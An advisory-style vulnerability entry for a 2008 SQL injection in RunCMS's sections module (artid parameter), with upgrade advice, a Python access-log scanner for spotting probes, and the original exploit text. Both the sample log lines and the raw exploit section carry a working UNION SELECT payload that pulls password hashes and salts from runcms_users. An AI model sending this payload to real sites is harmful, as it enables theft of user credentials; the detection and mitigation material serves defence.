Vendor: RunCMS
By: Cr@zy_King
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: RunCMS
Affected Version From: Prior to 1.6.2
Affected Version To: Prior to 1.6.2
Patch Exists: YES
Related CWE: CVE-2008-1445
CPE: a:runcms:runcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows, Mac
2008

RunCMS Module Section (artid) Remote SQL Injection Vulnerability

RunCMS is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. RunCMS versions prior to 1.6.2 are vulnerable.

Mitigation:

Upgrade to version 1.6.2 or later.
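
For sites that cannot upgrade immediately, or that want to check whether the flaw was probed, the web server access log can be reviewed for requests to the sections module whose artid is not a plain number. The following is an added example, not code from RunCMS or from the original advisory; it assumes artid is normally a numeric article ID and that the server writes Apache-style combined log lines, and the log lines in it are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined style), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Mar/2008:10:01:02 +0000] "GET /modules/sections/index.php?op=viewarticle&artid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Mar/2008:10:03:17 +0000] "GET /modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2 HTTP/1.1" 200 4877',
    '192.0.2.10 - - [20/Mar/2008:10:04:40 +0000] "GET /modules/news/index.php?storyid=3 HTTP/1.1" 200 3011',
    '192.0.2.77 - - [20/Mar/2008:10:05:09 +0000] "GET /modules/sections/index.php?op=viewarticle&artid=7%20UNION%20SELECT%201 HTTP/1.1" 200 4102',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate artid is an unsigned decimal integer.
NUMERIC_RE = re.compile(r"[0-9]+")


def suspicious_artid_requests(lines):
    """Return (client, decoded artid) for sections requests with a non-numeric artid."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable request line
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/modules/sections/index.php"):
            continue
        # parse_qs URL-decodes values, so '+' and '%20' both become spaces.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("artid", []):
            if not NUMERIC_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_artid_requests(SAMPLE_LOG):
        print(f"{client}\tartid={value!r}")
```

A hit that returned HTTP 200 on a version prior to 1.6.2 is a reason to treat the credentials in runcms_users as exposed and rotate them after upgrading.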

Exploit-DB raw data:

Cr@zy_King

crazy_kinq@hotmail.co.uk / hackshow.us

Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91

Runcms Module Section (artid) Remote Sql Inj. Vuln.

Example :

 - modules/sections/index.php?op=viewarticle&artid=Sql

 - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

Cr@ Says : Memati will not die in Kurtlar Vadisi, nobody should get excited :D

Alemin_Krali Says : Exactly, I agree (whatever the hell that has to do with anything)

Good.

# milw0rm.com [2008-03-20]